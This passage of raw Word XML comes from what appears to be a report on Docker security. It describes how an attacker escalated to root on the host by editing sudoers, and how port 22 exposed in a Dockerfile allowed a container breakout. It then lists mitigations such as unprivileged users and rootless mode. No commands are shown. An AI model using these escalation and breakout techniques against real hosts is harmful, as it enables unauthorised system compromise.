        <w:t xml:space="preserve"> sudoers file </w:t>
      </w:r>
      <w:r w:rsidR="00612A98">
        <w:t xml:space="preserve">using the commands </w:t>
      </w:r>
      <w:r w:rsidR="00784E13">
        <w:t>shown</w:t>
      </w:r>
      <w:r w:rsidR="00526596">
        <w:t xml:space="preserve"> in figure 28</w:t>
      </w:r>
      <w:r w:rsidR="00784E13">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF3033">
        <w:t xml:space="preserve">on the </w:t>
      </w:r>
      <w:r w:rsidR="00784E13">
        <w:t>above.</w:t>
      </w:r>
      <w:r w:rsidR="00526596">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F5486">
        <w:t xml:space="preserve">Finally, the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00E72B76">
        <w:t xml:space="preserve">was able to run bash commands without </w:t>
      </w:r>
      <w:r w:rsidR="00632BAF">
        <w:t>supplying or knowing</w:t>
      </w:r>
      <w:r w:rsidR="004824B1">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00632BAF">
        <w:t xml:space="preserve"> root password, as shown in figure 60.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B047359" w14:textId="6FD74FA8" w:rsidR="0063454E" w:rsidRDefault="0063454E" w:rsidP="0063454E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="520B10F1" wp14:editId="0D95CED0">
            <wp:extent cx="4544060" cy="859155"/>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44060" cy="859155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3217C650" w14:textId="4FB66CA5" w:rsidR="00632BAF" w:rsidRPr="008F5F41" w:rsidRDefault="00632BAF" w:rsidP="008F704B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="142" w:name="_Toc86858650"/>
      <w:r w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>59</w:t>
      </w:r>
      <w:r w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="005122BB" w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> A </w:t>
      </w:r>
      <w:r w:rsidR="00AE1279" w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>container launched based on the base image attacker.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="142"/>
    </w:p>
    <w:p w14:paraId="4997697E" w14:textId="4B3FCF6B" w:rsidR="00CB4414" w:rsidRDefault="00CB4414" w:rsidP="004F5DD5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C828936" w14:textId="2F4E0AE1" w:rsidR="00E44678" w:rsidRDefault="00632BAF" w:rsidP="00632BAF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67717A0D" wp14:editId="29F3737E">
            <wp:extent cx="3581337" cy="729615"/>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25959" cy="738706"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6004208B" w14:textId="285AFE66" w:rsidR="00632BAF" w:rsidRDefault="00632BAF" w:rsidP="008F704B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="143" w:name="_Toc86858651"/>
      <w:r w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>60</w:t>
      </w:r>
      <w:r w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00AE1279" w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> After the attack</w:t>
      </w:r>
      <w:r w:rsidR="008F704B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="143"/>
    </w:p>
    <w:p w14:paraId="38124459" w14:textId="54E69E71" w:rsidR="00390544" w:rsidRDefault="00B27E5D" w:rsidP="00390544">
      <w:r>
        <w:t xml:space="preserve">The attacker has now </w:t>
      </w:r>
      <w:r w:rsidR="00500B06">
        <w:t xml:space="preserve">gained </w:t>
      </w:r>
      <w:r w:rsidR="00BC7796">
        <w:t xml:space="preserve">full </w:t>
      </w:r>
      <w:r w:rsidR="00500B06">
        <w:t>access to the</w:t>
      </w:r>
      <w:r w:rsidR="00AA6B5F">
        <w:t xml:space="preserve"> host’s</w:t>
      </w:r>
      <w:r w:rsidR="00500B06">
        <w:t xml:space="preserve"> kernel </w:t>
      </w:r>
      <w:r w:rsidR="00491CCF">
        <w:t>with root privilege</w:t>
      </w:r>
      <w:r w:rsidR="00500B06">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00491CCF">
        <w:t xml:space="preserve"> In Linux, </w:t>
      </w:r>
      <w:r w:rsidR="00153DD3">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00491CCF">
        <w:t xml:space="preserve">root user </w:t>
      </w:r>
      <w:r w:rsidR="004B485E">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00A37511">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C45A5F">
        <w:t>a superuser with unlimited privilege, and therefore, the attacker can</w:t>
      </w:r>
      <w:r w:rsidR="005C5781">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00114716">
        <w:t>manipulate the host’s kernel en</w:t>
      </w:r>
      <w:r w:rsidR="00FB0CFD">
        <w:t>dlessly</w:t>
      </w:r>
      <w:r w:rsidR="00415B5B">
        <w:t>, according to</w:t>
      </w:r>
      <w:r w:rsidR="00C02D4C" w:rsidRPr="00C02D4C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1123144177"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00C02D4C">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C02D4C">
            <w:instrText xml:space="preserve"> CITATION RYa18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C02D4C">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[51]</w:t>
          </w:r>
          <w:r w:rsidR="00C02D4C">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="002B217F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1130517475"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="002B217F">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="002B217F">
            <w:instrText xml:space="preserve"> CITATION ATo20 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="002B217F">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[77]</w:t>
          </w:r>
          <w:r w:rsidR="002B217F">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="0005707D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00787E89">
        <w:t xml:space="preserve"> For instance, the attacker can </w:t>
      </w:r>
      <w:r w:rsidR="00500EA5">
        <w:t xml:space="preserve">identify the </w:t>
      </w:r>
      <w:r w:rsidR="00E24571">
        <w:t xml:space="preserve">applications running </w:t>
      </w:r>
      <w:r w:rsidR="00E04A39">
        <w:t xml:space="preserve">on the host to find </w:t>
      </w:r>
      <w:r w:rsidR="00A7452B">
        <w:t>and exploit vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="0039351D">
        <w:t xml:space="preserve">. Also, the attacker can exploit </w:t>
      </w:r>
      <w:r w:rsidR="00122F3D">
        <w:t>vulnerable containers</w:t>
      </w:r>
      <w:r w:rsidR="00031D89">
        <w:t xml:space="preserve"> inside </w:t>
      </w:r>
      <w:r w:rsidR="00D32F9D">
        <w:t>the Docker environment</w:t>
      </w:r>
      <w:r w:rsidR="00122F3D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00167073">
        <w:t>to run malicious code</w:t>
      </w:r>
      <w:r w:rsidR="00FB6714">
        <w:t>, such as crypto miners</w:t>
      </w:r>
      <w:r w:rsidR="00CF0B4A">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00FB6714">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00006CC7">
        <w:t>because the attacker has root access.</w:t>
      </w:r>
      <w:r w:rsidR="00AD207E">
        <w:t xml:space="preserve"> Further, </w:t>
      </w:r>
      <w:r w:rsidR="00CF0B4A">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="007E0DB8">
        <w:t xml:space="preserve">privilege escalation attack on </w:t>
      </w:r>
      <w:r w:rsidR="00CF0B4A">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="007E0DB8">
        <w:t xml:space="preserve">Docker container </w:t>
      </w:r>
      <w:r w:rsidR="000212B2">
        <w:t xml:space="preserve">enables </w:t>
      </w:r>
      <w:r w:rsidR="00800F32">
        <w:t xml:space="preserve">the attacker to alter </w:t>
      </w:r>
      <w:r w:rsidR="00CF0B4A">
        <w:t>confiden</w:t>
      </w:r>
      <w:r w:rsidR="00143635">
        <w:t>tial</w:t>
      </w:r>
      <w:r w:rsidR="000F3BCE">
        <w:t xml:space="preserve"> files, such as “/etc/passwd/”</w:t>
      </w:r>
      <w:r w:rsidR="00CD073F">
        <w:t xml:space="preserve"> illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00BC1574">
        <w:t>29</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1692604573"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00DD7C26">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00DD7C26">
            <w:instrText xml:space="preserve"> CITATION Lin18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00DD7C26">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[54]</w:t>
          </w:r>
          <w:r w:rsidR="00DD7C26">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00891132">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00F21944">
        <w:t>In general, the implications of</w:t>
      </w:r>
      <w:r w:rsidR="00201988">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00F21944">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001415C6">
        <w:t>privilege</w:t>
      </w:r>
      <w:r w:rsidR="00201988">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="001415C6">
        <w:t xml:space="preserve"> attack</w:t>
      </w:r>
      <w:r w:rsidR="00F21944">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B02040">
        <w:t xml:space="preserve">can be </w:t>
      </w:r>
      <w:r w:rsidR="00415B5B">
        <w:t>harmful,</w:t>
      </w:r>
      <w:r w:rsidR="00B02040">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00AB4909">
        <w:t xml:space="preserve">its attack surface is </w:t>
      </w:r>
      <w:r w:rsidR="00CE4443">
        <w:t>vast</w:t>
      </w:r>
      <w:r w:rsidR="00331278">
        <w:t>, especiall</w:t>
      </w:r>
      <w:r w:rsidR="00E55194">
        <w:t xml:space="preserve">y when the host </w:t>
      </w:r>
      <w:r w:rsidR="004C34AD">
        <w:t xml:space="preserve">running Docker is </w:t>
      </w:r>
      <w:r w:rsidR="009950C9">
        <w:t xml:space="preserve">rented </w:t>
      </w:r>
      <w:r w:rsidR="00C236FA">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00E721ED">
        <w:t xml:space="preserve"> multiple clients </w:t>
      </w:r>
      <w:r w:rsidR="00A71D56">
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidR="00C236FA">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00A71D56">
        <w:t xml:space="preserve"> cloud.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA31D78" w14:textId="0EA5CD6E" w:rsidR="00370E4F" w:rsidRDefault="00770729" w:rsidP="00390544">
      <w:r>
        <w:t xml:space="preserve">Configuring a container to run </w:t>
      </w:r>
      <w:r w:rsidR="000858E3">
        <w:t>with an unprivileged user is vital to protect against such attacks</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="762032288"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00C33DCE">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C33DCE">
            <w:instrText xml:space="preserve"> CITATION OWA21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C33DCE">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
          <w:r w:rsidR="00C33DCE">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00E8778C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DB3250">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="003A3890">
        <w:t>company Docker also strongly recommends</w:t>
      </w:r>
      <w:r w:rsidR="00592DB5">
        <w:t xml:space="preserve"> users</w:t>
      </w:r>
      <w:r w:rsidR="003A3890">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00003283">
        <w:t xml:space="preserve">to run containers </w:t>
      </w:r>
      <w:r w:rsidR="00592DB5">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidR="004241F5">
        <w:t xml:space="preserve">unprivileged </w:t>
      </w:r>
      <w:r w:rsidR="00B8278D">
        <w:t>mode</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1611280049"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="007B4275">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="007B4275">
            <w:instrText xml:space="preserve"> CITATION doc212 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="007B4275">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[35]</w:t>
          </w:r>
          <w:r w:rsidR="007B4275">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00B8278D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00794EC1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A41A96">
        <w:t>Additional</w:t>
      </w:r>
      <w:r w:rsidR="00740E2E">
        <w:t xml:space="preserve"> mitigation techniques </w:t>
      </w:r>
      <w:r w:rsidR="00286861">
        <w:t xml:space="preserve">can also </w:t>
      </w:r>
      <w:r w:rsidR="00C208AD">
        <w:t xml:space="preserve">be </w:t>
      </w:r>
      <w:r w:rsidR="00A01D9E">
        <w:t>implemented</w:t>
      </w:r>
      <w:r w:rsidR="00C208AD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D75006">
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidR="00C208AD">
        <w:t xml:space="preserve"> the following</w:t>
      </w:r>
      <w:r w:rsidR="00D75006">
        <w:t xml:space="preserve"> lists</w:t>
      </w:r>
      <w:r w:rsidR="00C208AD">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D372E33" w14:textId="408B0D22" w:rsidR="00740E2E" w:rsidRDefault="00063FD5" w:rsidP="00740E2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Specify </w:t>
      </w:r>
      <w:r w:rsidR="00C1561B">
        <w:t>unprivileged user in the Dockerfile</w:t>
      </w:r>
      <w:r w:rsidR="00EF7FCF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1281C568" w14:textId="30A4964A" w:rsidR="0020383F" w:rsidRDefault="00EF7FCF" w:rsidP="002077C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enable Linux capabilities features, including </w:t>
      </w:r>
      <w:r w:rsidR="003C624E">
        <w:t xml:space="preserve">AppArmor, </w:t>
      </w:r>
      <w:r w:rsidR="00410C8E">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="003C624E">
        <w:t>eccomp, and S</w:t>
      </w:r>
      <w:r w:rsidR="00410C8E">
        <w:t>EL</w:t>
      </w:r>
      <w:r w:rsidR="003C624E">
        <w:t>inux</w:t>
      </w:r>
      <w:r w:rsidR="00410C8E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744AC292" w14:textId="72E70B32" w:rsidR="002077C3" w:rsidRDefault="00623284" w:rsidP="002077C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:r w:rsidR="006F44D3">
        <w:t>Docker daemon in rootless mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D1B227" w14:textId="77777777" w:rsidR="00FE6150" w:rsidRDefault="00FE6150" w:rsidP="00FE6150">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E583282" w14:textId="09F40E78" w:rsidR="00675E14" w:rsidRDefault="00675E14" w:rsidP="002077C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00675E14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Container breakout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD9CDFC" w14:textId="56CE732F" w:rsidR="00080C04" w:rsidRDefault="002227F2" w:rsidP="002077C3">
      <w:r>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="00776DDC">
        <w:t xml:space="preserve">is attack </w:t>
      </w:r>
      <w:r w:rsidR="0016000C">
        <w:t xml:space="preserve">clearly </w:t>
      </w:r>
      <w:r w:rsidR="00776DDC">
        <w:t>showed</w:t>
      </w:r>
      <w:r w:rsidR="008A15A1">
        <w:t xml:space="preserve"> the security threats </w:t>
      </w:r>
      <w:r w:rsidR="00781367">
        <w:t xml:space="preserve">of exposing ports </w:t>
      </w:r>
      <w:r w:rsidR="00107437">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="009914CA">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00107437">
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="007E57CD">
        <w:t>environment.</w:t>
      </w:r>
      <w:r w:rsidR="0094798B">
        <w:t xml:space="preserve"> The attacker was able to exploit the</w:t>
      </w:r>
      <w:r w:rsidR="009F0FFC">
        <w:t xml:space="preserve"> containers because one of </w:t>
      </w:r>
      <w:r w:rsidR="00634370">
        <w:t xml:space="preserve">the Dockerfile exposes port 22 </w:t>
      </w:r>
      <w:r w:rsidR="00D67A01">
        <w:t>to the</w:t>
      </w:r>
      <w:r w:rsidR="0076680C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D67A01">
        <w:t>host via the</w:t>
      </w:r>
      <w:r w:rsidR="0076680C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000836B3">
        <w:t>forwarded port.</w:t>
      </w:r>
      <w:r w:rsidR="00D92515">
        <w:t xml:space="preserve"> As </w:t>
      </w:r>
      <w:r w:rsidR="00910664">
        <w:t>shown in the implementation section, the</w:t>
      </w:r>
      <w:r w:rsidR="000E5DE3">
        <w:t xml:space="preserve"> author was able to ssh onto the non-ssh container without </w:t>
      </w:r>
      <w:r w:rsidR="00EE44F8">
        <w:t xml:space="preserve">any </w:t>
      </w:r>
      <w:r w:rsidR="00B813B9">
        <w:t xml:space="preserve">difficulties, although the container </w:t>
      </w:r>
      <w:r w:rsidR="003F05B9">
        <w:t>is ssh disabled</w:t>
      </w:r>
      <w:r w:rsidR="00255591">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00482190">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00482190">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">as shown in figure </w:t>
      </w:r>
      <w:r w:rsidR="00E954DB">
        <w:t>61</w:t>
      </w:r>
      <w:r w:rsidR="003F05B9">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00080C04">
        <w:t xml:space="preserve"> Typically, </w:t>
      </w:r>
      <w:r w:rsidR="00DA6A8E">
        <w:t xml:space="preserve">in a traditional network system, </w:t>
      </w:r>
      <w:r w:rsidR="009F5152">
        <w:t xml:space="preserve">one cannot </w:t>
      </w:r>
      <w:r w:rsidR="00DA6A8E">
